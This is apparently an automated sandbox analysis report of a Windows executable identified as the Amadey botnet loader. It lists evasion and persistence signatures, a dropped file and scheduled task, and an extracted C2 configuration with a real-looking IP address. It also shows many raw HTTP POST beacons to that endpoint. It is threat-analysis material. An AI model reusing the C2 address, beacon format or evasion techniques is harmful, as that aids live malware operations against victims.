Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520516
MD5: e3aa1042729bc6d0ddbed39ddb48b872
SHA1: d9642336d578f012359bbd1f49c90798a76d92ac
SHA256: 14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
Tags: exeuser-Bitsight
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49711 -> 185.215.113.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.16
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0040BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_0040BD60
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOF_i
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded6
Source: axplong.exe, 00000006.00000002.2627219543.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedn

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0040E440 6_2_0040E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00443068 6_2_00443068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00404CF0 6_2_00404CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00437D83 6_2_00437D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0044765B 6_2_0044765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00404AF0 6_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0044777B 6_2_0044777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00446F09 6_2_00446F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00448720 6_2_00448720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00442BD0 6_2_00442BD0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9972060200953679
Source: file.exe Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9972060200953679
Source: axplong.exe.0.dr Static PE information: Section: wpzcbdbk ZLIB complexity 0.9945939571060383
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 52%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
